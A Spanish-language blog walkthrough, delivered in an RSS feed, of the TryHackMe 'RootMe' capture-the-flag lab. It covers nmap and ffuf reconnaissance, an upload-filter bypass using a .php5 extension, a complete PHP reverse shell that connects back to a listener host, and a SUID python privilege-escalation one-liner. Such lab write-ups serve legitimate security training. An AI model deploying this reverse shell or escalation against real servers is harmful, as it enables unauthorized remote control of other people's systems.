<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: C4rnotaurus</title>
    <description>The latest articles on DEV Community by C4rnotaurus (@c4s).</description>
    <link>https://dev.to/c4s</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3054141%2F0bbcae5d-9083-4566-a80e-1b80e1c67d67.jpg</url>
      <title>DEV Community: C4rnotaurus</title>
      <link>https://dev.to/c4s</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/c4s"/>
    <language>en</language>
    <item>
      <title>RootMe | TryHackMe | Spanish</title>
      <dc:creator>C4rnotaurus</dc:creator>
      <pubDate>Fri, 18 Apr 2025 04:50:10 +0000</pubDate>
      <link>https://dev.to/c4s/rootme-tryhackme-spanish-34ej</link>
      <guid>https://dev.to/c4s/rootme-tryhackme-spanish-34ej</guid>
      <description>&lt;p&gt;Luego de conectarse a la máquina y ver que efectivamente tenemos conexión con aquello, hacemos un escaneo con Nmap &lt;code&gt;nmap -Pn -n --open --top-ports 10000 -T5 -sVC [IP obejetivo]&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fd0e4myakwiw63fhovmle.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fd0e4myakwiw63fhovmle.png" alt="Image Nmap" width="800" height="379"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuyw44cqiweyreqp3z4l9.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuyw44cqiweyreqp3z4l9.png" alt="Image página" width="800" height="427"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Con esta información respondemos las preguntas de la Task 2, que sería: 2 puertos abiertos, versión de Apache 2.4.29 y SSH corriendo en el puerto 22. En la última respuesta que se ve en la imagen solo hay que hacer click en completado, ya que nos dice que hagamos un escaneo de directorios con &lt;code&gt;gobuster&lt;/code&gt;, pero en mi caso lo hice con &lt;code&gt;Ffuf&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fs23gb4mfqmkqxiv9b02t.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fs23gb4mfqmkqxiv9b02t.png" alt="Image task2" width="800" height="382"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Para la última pregunta debemos hacer fuzzing, ya que nos pregunta sobre cuál es el directorio visible, para lo cual use &lt;code&gt;Ffuf&lt;/code&gt; &lt;code&gt;ffuf -u [IP objetivo] -w [Ruta_diccionario]&lt;/code&gt;, el cual nos da los siguientes directorios.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe05ly9eouxhiu7t9s33a.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe05ly9eouxhiu7t9s33a.png" alt="Image Fuzz" width="800" height="319"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Los directorios importantes son &lt;code&gt;/uploads&lt;/code&gt;, que lo usaremos más adelante, y &lt;code&gt;/panel&lt;/code&gt;, siendo este último el que nos interesa ahora para realizar la task 3 y también la última respuesta de la task 2.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkywp2fiqaumv2zxrl05s.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkywp2fiqaumv2zxrl05s.png" alt="Image panel" width="800" height="498"&gt;&lt;/a&gt;&lt;/p&gt;










&lt;p&gt;Observamos que la task 3 nos dice que debemos &lt;code&gt;subir un archivo&lt;/code&gt; para obtener una &lt;code&gt;reverse shell&lt;/code&gt;, para lo cual usaremos una Shell reversa &lt;code&gt;php&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Crearemos un archivo.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;nano reverse.php5
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Usamos la extensión &lt;code&gt;.php5&lt;/code&gt;, ya que si lo subimos con &lt;code&gt;.php&lt;/code&gt; nos dirá que no aceptan ese tipo de archivos y por ende haremos bypass colocando un &lt;code&gt;5&lt;/code&gt; al final de la extensión. Luego pondremos el siguiente código dentro de nuestro archivo recién creado. &lt;/p&gt;

&lt;p&gt;PD: Recuerden que &lt;code&gt;host&lt;/code&gt; es el de la VPN, o sea, colocamos la IP de &lt;code&gt;tun0&lt;/code&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt;
&lt;span class="nb"&gt;set_time_limit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="nb"&gt;ignore_user_abort&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="nv"&gt;$host&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"127.0.0.1"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="c1"&gt;// Cambia por la IP del servidor listener&lt;/span&gt;
&lt;span class="nv"&gt;$port&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;4444&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="c1"&gt;// Cambia por el puerto del servidor listener&lt;/span&gt;
&lt;span class="nv"&gt;$shell&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"/bin/bash"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="c1"&gt;// Usa bash para mejor interactividad&lt;/span&gt;

&lt;span class="c1"&gt;// Intenta conectar al listener&lt;/span&gt;
&lt;span class="nv"&gt;$socket&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;fsockopen&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$host&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$port&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$errno&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$errstr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;30&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="nv"&gt;$socket&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;die&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$errstr&lt;/span&gt;&lt;span class="s2"&gt; (&lt;/span&gt;&lt;span class="nv"&gt;$errno&lt;/span&gt;&lt;span class="s2"&gt;)&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="c1"&gt;// Configura descriptores para un entorno interactivo&lt;/span&gt;
&lt;span class="nv"&gt;$descriptorspec&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;array&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="k"&gt;array&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;"pipe"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;"r"&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="c1"&gt;// stdin&lt;/span&gt;
    &lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="k"&gt;array&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;"pipe"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;"w"&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="c1"&gt;// stdout&lt;/span&gt;
    &lt;span class="mi"&gt;2&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="k"&gt;array&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;"pipe"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;"w"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;  &lt;span class="c1"&gt;// stderr&lt;/span&gt;
&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="c1"&gt;// Inicia el proceso con bash en modo interactivo&lt;/span&gt;
&lt;span class="nv"&gt;$process&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;proc_open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$shell&lt;/span&gt;&lt;span class="s2"&gt; -i"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$descriptorspec&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$pipes&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="nb"&gt;is_resource&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$process&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;die&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;"No se pudo iniciar el proceso&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="c1"&gt;// Configura los pipes como no bloqueantes&lt;/span&gt;
&lt;span class="nb"&gt;stream_set_blocking&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pipes&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="nb"&gt;stream_set_blocking&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pipes&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="nb"&gt;stream_set_blocking&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pipes&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="nb"&gt;stream_set_blocking&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$socket&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="c1"&gt;// Lee desde el socket (comandos del atacante)&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$input&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;fread&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$socket&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;512&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="nb"&gt;fwrite&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pipes&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="nv"&gt;$input&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="nb"&gt;fflush&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pipes&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="c1"&gt;// Lee la salida del proceso (stdout)&lt;/span&gt;
    &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$output&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;fgets&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pipes&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;]))&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="nb"&gt;fwrite&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$socket&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$output&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="nb"&gt;fflush&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$socket&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="c1"&gt;// Lee los errores del proceso (stderr)&lt;/span&gt;
    &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$error&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;fgets&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pipes&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;]))&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="nb"&gt;fwrite&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$socket&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$error&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="nb"&gt;fflush&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$socket&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="c1"&gt;// Verifica si el proceso o el socket están cerrados&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;feof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$socket&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="nb"&gt;is_resource&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$process&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="c1"&gt;// Evita consumo excesivo de CPU&lt;/span&gt;
    &lt;span class="nb"&gt;usleep&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;10000&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="c1"&gt;// Limpieza&lt;/span&gt;
&lt;span class="nb"&gt;fclose&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pipes&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
&lt;span class="nb"&gt;fclose&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pipes&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
&lt;span class="nb"&gt;fclose&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pipes&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
&lt;span class="nb"&gt;fclose&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$socket&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="nb"&gt;proc_close&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$process&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Una vez creado, nos vamos al panel a subir el archivo.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F61v64cdrfjciimx2ue2f.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F61v64cdrfjciimx2ue2f.png" alt="Image archivo" width="137" height="36"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Nos ponemos a escuchar en el puerto que hemos configurado anteriormente en el código php.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbrpfwi24lj3d0aguxcc8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbrpfwi24lj3d0aguxcc8.png" alt="Image escucha" width="454" height="219"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Y ahora es cuando nos sirve el segundo directorio que he mencionado anteriormente &lt;code&gt;/uploads&lt;/code&gt;, aquí está el archivo el cual subimos.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi12qbst0y8g26bepidaq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi12qbst0y8g26bepidaq.png" alt="Image subidas" width="800" height="364"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Debemos darle click para que empiece a funcionar nuestra Shell reversa. Hacemos un &lt;code&gt;id&lt;/code&gt; para comprobar.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F679sle03hfreg911rfkn.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F679sle03hfreg911rfkn.png" alt="Image id" width="800" height="161"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Posteriormente, hacemos un &lt;code&gt;find / -name user.txt&lt;/code&gt; para buscar el archivo que nos solicitaron en la pregunta, encontramos su ubicación y lo abrimos con un &lt;code&gt;cat&lt;/code&gt;, así dándonos la flag.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F91z6o7qppwtb5f1puf2k.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F91z6o7qppwtb5f1puf2k.png" alt="Image primera bandera" width="800" height="152"&gt;&lt;/a&gt;&lt;/p&gt;










&lt;p&gt;En la task 4 nos dice que debemos escalar privilegios, en la primera pregunta, nos da una pista de un comando que usaremos para ver los permisos SUID del usuario root &lt;code&gt;find / -user root -perm /4000&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi2ez9txebpz6v60v0tu2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi2ez9txebpz6v60v0tu2.png" alt="Image SUID" width="800" height="276"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Al usarlo, nos revela la lista de archivos del que es propietario el usuario &lt;code&gt;root&lt;/code&gt;, teniendo el bit SUID activado &lt;code&gt;-perm /4000&lt;/code&gt;, este nos permite ejecutar un archivo con los permisos del propietario, o sea,  cualquier usuario que lo ejecute lo hará con privilegios de root. En este caso &lt;code&gt;/usr/bin/python&lt;/code&gt; aparece en la lista, siendo este el intérprete de &lt;code&gt;Python&lt;/code&gt;, básicamente podemos correr código con privilegios de root.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fklg7re4fqcsuxwba60jc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fklg7re4fqcsuxwba60jc.png" alt="Image python" width="800" height="519"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Buscamos en &lt;a href="https://gtfobins.github.io/" rel="noopener noreferrer"&gt;GTFOBins&lt;/a&gt; bajo el filtro de SUID.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgc2lkwuyfphcph45xcxy.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgc2lkwuyfphcph45xcxy.png" alt="Image SUID" width="800" height="476"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Nos desplazamos hacia abajo hasta encontrar "python" y seleccionamos "SUID".&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flbyfwm06e8gls8s3icih.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flbyfwm06e8gls8s3icih.png" alt="Image suid py" width="800" height="70"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Y usaremos el comando que nos da para elevar privilegios &lt;code&gt;python -c 'import os; os.execl("/bin/sh", "sh", "-p")'&lt;/code&gt;.&lt;/p&gt;

